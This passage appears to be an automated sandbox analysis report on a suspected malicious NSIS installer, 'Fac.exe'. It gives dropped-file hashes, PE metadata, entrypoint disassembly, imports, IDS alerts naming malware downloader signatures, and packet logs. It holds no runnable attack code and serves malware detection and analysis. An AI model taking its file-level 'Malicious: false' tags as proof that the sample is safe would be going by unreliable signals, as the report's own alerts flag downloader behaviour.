Size (bytes):	11776
Entropy (8bit):	5.890541747176257
Encrypted:	false
SSDEEP:	192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
MD5:	75ED96254FBF894E42058062B4B4F0D1
SHA1:	996503F1383B49021EB3427BC28D13B5BBD11977
SHA-256:	A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
SHA-512:	58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: Factura Honorarios 2024-11-17.exe, Detection: malicious, Browse Filename: rCEMG242598.exe, Detection: malicious, Browse Filename: SBSLMD5qhm.msi, Detection: malicious, Browse Filename: mU4lYkmS6K.exe, Detection: malicious, Browse Filename: SBSLMD5qhm.msi, Detection: malicious, Browse Filename: mU4lYkmS6K.exe, Detection: malicious, Browse Filename: TouchEn_nxKey_32bit.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Riskware.OfferCore.11979.8662.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Riskware.OfferCore.11979.8662.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\Faaborgs\kvaksalvere.res

Download File

Process:	C:\Users\user\Desktop\Fac.exe
File Type:	data
Category:	dropped
Size (bytes):	405939
Entropy (8bit):	1.2491912183523404
Encrypted:	false
SSDEEP:	1536:eSl70WcO+njwdPBRvYfH7gIxVXMBMAPAtG3nXw0g9:eSGWgni5egGVcu6AwQ0g9
MD5:	B8F536887229B6B6A9D9F1C6BDBC830A
SHA1:	7F6AF7E79427319CD428930CD325EBF234140246
SHA-256:	9F084456A8DB39E0BE8FF458A057CC112F28976F50CCDEB6B9968475211E36B6
SHA-512:	754F73D030295425F40FDD4D6B6E32F9D48D08976218510670AF508A2E74041ABE6317770ACBDB6278B0FBBB4908D1B9282462D61F526404CFF3C781431716BE
Malicious:	false
Reputation:	low
Preview:	............................Pj..........................i%..........................J..........................#..c.........................../......C.#.............................].i..=.....C..............................................................................................................................j............{..................................................................G...........................................................................................^K..............................<..$.................................................#.............................................................4..............N................................%.......................................................-...................`............................E.)..f..........................................................l..............l.........................................#.]............K.....................................8....9.............n...............

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\Faaborgs\ters.gra

Download File

Process:	C:\Users\user\Desktop\Fac.exe
File Type:	data
Category:	dropped
Size (bytes):	485288
Entropy (8bit):	1.252508150615448
Encrypted:	false
SSDEEP:	1536:nCssk3ToWdMOZQJ6sF7DR6iI3gP1KeCHDkTv:nCssk3UCNMZDRMkeyv
MD5:	B7786B087E97406D67958314CE8D7DFC
SHA1:	857FBDE03F498A5CF1B386C74485C24633673AF4
SHA-256:	7A03749583188B2FBBF13ED0788600C942BBA5FCF4D34BEBBEC2764CB35C2D7B
SHA-512:	5FA986F3F85D66DCD22643B11F233EBA31E04006D7F2EFCCE22CF6CB29B072E2F86FD3AA5B707D1CEC6ED3522D49EFDD247241AE147C5692AD5D438B31525767
Malicious:	false
Reputation:	low
Preview:	..............................g.....................................7........................................................................\|...........r...................................q.....................................0................^.............]................@............4..........p..........................y..................................................8...............3...........%.............;T.................{...`:..........=...........................j.............................................q..............O................+......&...................................r................E...................;................d....R...................................................}..................K.....j......................................^.........G.............y.....................3....................................................#.....i..........0..............................................................O....................m..........1..........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\Inhomogenitet.Udg

Download File

Process:	C:\Users\user\Desktop\Fac.exe
File Type:	data
Category:	dropped
Size (bytes):	305962
Entropy (8bit):	7.673466409567496
Encrypted:	false
SSDEEP:	6144:CemsAiGrmy3IJvr7hBRlXCr0wnm/Ry8DhPyW6:9mmGrmy3AHhHxCr0wKxhPl6
MD5:	7A7D3983B18FCD1E0DED92B257CC327A
SHA1:	BC897043B1DE7C91E5C972822454B0EC1FBB77FA
SHA-256:	CF6627AEA3A4369C9BB92E368BA020FD565CF22E0AF140430BB4B517F38B288A
SHA-512:	3377C7D0B88BD7CB07F1DE825FA7F8E4F1B468539004770E9813E951B9A74CD93C1F3DE207AA6AFFC776D82327DEBB692EA72E74621101E0A04A09BE61197CA0
Malicious:	false
Reputation:	low
Preview:	....YYYY..K.........................ddd..........m...nn...4...JJ....v.......)................NN..0......i................................U.....rrrr...................e....................t....m.........ee........yy.+.............OO.......*...............D.~~~.RR............................ooo....b....3.'.!!!...;;;;;...MMM.J........j.d.}....<...............:.............88............)..........MM.... ..n....J...v..m...... ..CCC..L..................DDD.}}...YYY....++........................}}..K.]]........>.....1......?.LLLL......z.tt.......P.....................22.......Z.ZZZ.HH.............k..............y................t...........F.ttttttttt....w........E............................/////............2....................-............**.d...........................................G...h..oo..z.. ..D.O..DDD.8......\|.oo.===...`....Y...i......)).1...........}............................YY...............#......................JJJ.............zzzzzz.......................z............

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\autotypes.ome

Download File

Process:	C:\Users\user\Desktop\Fac.exe
File Type:	data
Category:	dropped
Size (bytes):	260287
Entropy (8bit):	1.254154410305323
Encrypted:	false
SSDEEP:	768:Q5nWJhkFhi66opmz9ShwPfMJWoQm6ScPZktW4mOyQi0Qj6RbEKq2hmPpR+4ZFetp:t3zfTlGsyyshore
MD5:	28C5FEB9676D16DFCAC793FCB586D0BF
SHA1:	7EA42930F4771A57AA51F3A36BD3492A9D423CA2
SHA-256:	60753AF58DB3E39BEC4353D9FEB84CA3E597B16B077AAB1CB1DB8F9617DA689A
SHA-512:	C9FFD961CE1B681FAE3502C42C30011DDFE3F07057E4AF9DD475CCE27EA7F757B136612AE9274FFD7846BD160A6FD3F9A051F811CC06B88D5A5A8E6C86E5D417
Malicious:	false
Preview:	.............................Y........8........................8......J........................................;......................................................w......:.....2......r.....................I...............................&............g......_...&......-.............K.........................p.............R.................n.............,...U..............................................................................................L.................. .................h...................................................d...........................................................(..........................................<...i......................k.....................................t..............1.............G.....................................................................:..T........................n.....x.t........T>...........x......................................X....................\|............A..........................Z..............t..............

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\fonta.jpg

Download File

Process:	C:\Users\user\Desktop\Fac.exe
File Type:	JPEG image data, baseline, precision 8, 300x400, components 3
Category:	dropped
Size (bytes):	10006
Entropy (8bit):	7.924618802758961
Encrypted:	false
SSDEEP:	192:lNvMk8Cb5NZDr/GNVAPsIGGKlmY6fJCveK/2dg7cfcyDmIqAtVv13q:l2+/F/GNVxAKv6Uv3/alfcJIq416
MD5:	6CADFF319A0C0C41B7A4DDB8BF97467B
SHA1:	BFFCA9F6851994C709B6DEC83333DA7D6033FE54
SHA-256:	402A8F58CB8AA75CF9D7A15F3D7E328F8703CCD7B5378F704D71660283D585F3
SHA-512:	40F2A4355A0A23D955FDA347FFF9490F89A36A83D1395DD144C93B75451DB82CCE010B16AE12391B466BAE45C7AE146BB54BD4FB4D44A430899CD5727F2E7C99
Malicious:	false
Preview:	.....C..............................................!........."$".$.......C.........................................................................,..".........................................B.........................!1.AQ.aq...."2..BR..#r....$34b..C.%ST................................"......................1.!.A."Qa.............?..1aB.]`.H.IHJ...NJ..H.Q..!A..LR.$e)NR.4B....p.;.r....c....%3....9F...mK....x.[g..J.!c..U..O,....]ne....].Lg.Zdr.h......EL~..7.t..9.=.T..A...q.r.rq..\|3.9.J..{.kI.....a1.......0....Yq..N...[E...D...{.^...,...{..1f1...8......[zi....D]..7-..X...G@..R..I:r....(....JH\.r...)wz.\.K..e.K....)wz.......]-.6...B.]z..R.a)IR.R9.R....(...N.J%.JG')..B..).R+.;.w(.JR..HJ.J."R....IJT..]b..dK.....cG%)rR.h..K....#.%..]....$%e.Mu..Ku.B=.\...=...%)^.6...(......R....tPE)JbR9...!LR..9FT.F."...D.%...7'rGn.B...HP.t.@.PXJ..J...).@...$.%a)IRa(..(]I.XJ.AF.e.%.n..n...t3$&.....z.V,^.2..2R.R.%. (.JB..JQ)IQ)@.R.....LJGl.WYF..Q....r.).B...R.....).).P+.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.530129654353906
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Fac.exe
File size:	722'501 bytes
MD5:	54025d91662e8fa2169596cd35431cda
SHA1:	40e1c2fbc4ef47373dfd69a8853c18e5095d4cf1
SHA256:	82736a226e54e0314c4b4e9967ef45eddbfd6bdc4737bb7d0d6f23cf89bde33c
SHA512:	edc43b538a0cc040d7ee53b360acbd424f3b03e3622b9b00b6975ce7543b4e2f2b7661452c444afb3ba45be9fa7fb70a624450ea862806d4234d53ec481f0bc7
SSDEEP:	12288:fTkuHDduR2Bqj82jeCCixMncA+XPiHmcrsQKnsk2axTsZ:fTRogAfCBiSnc7XPiGc1qxTsZ
TLSH:	B9E40183FC4886D0E9684F30647F1C7D87EB7E3A5948450E3B9CB6706DB3692D607A1A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....oZ.................d...*.....

File Icon


Icon Hash:	1716c64c5e5ab51d

Static PE Info

General

Entrypoint:	0x403359
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A6FED2E [Tue Jan 30 03:57:34 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b34f154ec913d2d2c435cbd644e91687

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A2E0h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080A8h]
call dword ptr [004080A4h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A20Ch], eax
je 00007FB72458E6B3h
push ebx
call 00007FB724591965h
cmp eax, ebx
je 00007FB72458E6A9h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007FB7245918DFh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FB72458E68Ch
push 0000000Ah
call 00007FB724591938h
push 00000008h
call 00007FB724591931h
push 00000006h
mov dword ptr [0042A204h], eax
call 00007FB724591925h
cmp eax, ebx
je 00007FB72458E6B1h
push 0000001Eh
call eax
test eax, eax
je 00007FB72458E6A9h
or byte ptr [0042A20Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A2D8h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216A8h
call dword ptr [00408188h]
push 0040A2C8h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4d000	0x31a60	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x62a5	0x6400	f4cff166abb4376522cf86cbd302f644	False	0.658984375	data	6.431390019180314	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x138e	0x1400	2914bac53cd4485c9822093463e4eea6	False	0.4509765625	data	5.146454805063938	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20318	0x600	7d0d44c89e64b001096d8f9c60b1ac1b	False	0.4928385416666667	data	3.90464114821524	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x22000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4d000	0x31a60	0x31c00	237771be3091971063543e3d2d100b74	False	0.4750166849874372	data	5.510842081259168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4d448	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.2920412871169999
RT_ICON	0x5dc70	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.422640319529115
RT_ICON	0x67118	0x71dc	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9881295457664334
RT_ICON	0x6e2f8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.4291589648798521
RT_ICON	0x73780	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.4052905054322154
RT_ICON	0x779a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5110995850622406
RT_ICON	0x79f50	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.5211069418386491
RT_ICON	0x7aff8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.5119936034115139
RT_ICON	0x7bea0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6262295081967213
RT_ICON	0x7c828	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.677797833935018
RT_ICON	0x7d0d0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States	0.6785714285714286
RT_ICON	0x7d798	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.49710982658959535
RT_ICON	0x7dd00	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.674645390070922
RT_DIALOG	0x7e168	0x100	data	English	United States	0.5234375
RT_DIALOG	0x7e268	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x7e388	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x7e450	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x7e4b0	0xbc	data	English	United States	0.6595744680851063
RT_VERSION	0x7e570	0x1ac	data	English	United States	0.5747663551401869
RT_MANIFEST	0x7e720	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-18T14:53:20.138741+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.11.20	49767	142.251.41.14	443	TCP
2024-11-18T14:53:24.895412+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.11.20	49769	193.122.6.168	80	TCP
2024-11-18T14:53:26.535622+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.11.20	49769	193.122.6.168	80	TCP
2024-11-18T14:53:26.948320+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.11.20	49771	104.21.67.152	443	TCP
2024-11-18T14:53:27.348298+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.11.20	49772	193.122.6.168	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 14:53:19.700161934 CET	49767	443	192.168.11.20	142.251.41.14
Nov 18, 2024 14:53:19.700273991 CET	443	49767	142.251.41.14	192.168.11.20
Nov 18, 2024 14:53:19.700491905 CET	49767	443	192.168.11.20	142.251.41.14
Nov 18, 2024 14:53:19.715662003 CET	49767	443	192.168.11.20	142.251.41.14
Nov 18, 2024 14:53:19.715689898 CET	443	49767	142.251.41.14	192.168.11.20
Nov 18, 2024 14:53:19.927340984 CET	443	49767	142.251.41.14	192.168.11.20
Nov 18, 2024 14:53:19.927690983 CET	49767	443	192.168.11.20	142.251.41.14
Nov 18, 2024 14:53:19.928916931 CET	443	49767	142.251.41.14	192.168.11.20
Nov 18, 2024 14:53:19.929199934 CET	49767	443	192.168.11.20	142.251.41.14
Nov 18, 2024 14:53:19.983226061 CET	49767	443	192.168.11.20	142.251.41.14
Nov 18, 2024 14:53:19.983279943 CET	443	49767	142.251.41.14	192.168.11.20
Nov 18, 2024 14:53:19.984214067 CET	443	49767	142.251.41.14	192.168.11.20
Nov 18, 2024 14:53:19.984391928 CET	49767	443	192.168.11.20	142.251.41.14
Nov 18, 2024 14:53:19.986118078 CET	49767	443	192.168.11.20	142.251.41.14
Nov 18, 2024 14:53:20.027997017 CET	443	49767	142.251.41.14	192.168.11.20
Nov 18, 2024 14:53:20.138767958 CET	443	49767	142.251.41.14	192.168.11.20
Nov 18, 2024 14:53:20.138865948 CET	443	49767	142.251.41.14	192.168.11.20
Nov 18, 2024 14:53:20.138972998 CET	49767	443	192.168.11.20	142.251.41.14
Nov 18, 2024 14:53:20.139019012 CET	49767	443	192.168.11.20	142.251.41.14
Nov 18, 2024 14:53:20.139841080 CET	49767	443	192.168.11.20	142.251.41.14
Nov 18, 2024 14:53:20.139868021 CET	443	49767	142.251.41.14	192.168.11.20
Nov 18, 2024 14:53:20.262998104 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:20.263071060 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:20.263242006 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:20.263463974 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:20.263488054 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:20.479373932 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:20.479624033 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:20.483128071 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:20.483164072 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:20.483571053 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:20.483771086 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:20.484177113 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:20.528302908 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.020849943 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.021151066 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.033965111 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.034292936 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.048060894 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.048433065 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.048475027 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.048801899 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.115040064 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.115685940 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.115727901 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.116283894 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.118551016 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.119198084 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.119240046 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.119803905 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.125742912 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.126039982 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.126106024 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.126460075 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.132108927 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.132297993 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.132322073 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.132566929 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.139153957 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.139410019 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.139434099 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.139686108 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.146038055 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.146397114 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.146441936 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.146687984 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.152739048 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.152995110 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.153018951 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.153336048 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.159831047 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.160110950 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.160154104 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.160485029 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.166271925 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.166604042 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.166649103 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.166980982 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.172497034 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.172770977 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.172795057 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.173063993 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.178859949 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.179117918 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.179142952 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.179454088 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.185208082 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.185537100 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.185580969 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.185906887 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.191541910 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.191921949 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.191966057 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.192295074 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.198096037 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.198487997 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.198533058 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.198864937 CET	49768	443	192.168.11.20	142.250.72.97
Nov 18, 2024 14:53:23.209673882 CET	443	49768	142.250.72.97	192.168.11.20
Nov 18, 2024 14:53:23.210052967 CET	49768	443	192.168.11.20	142.250.72.97
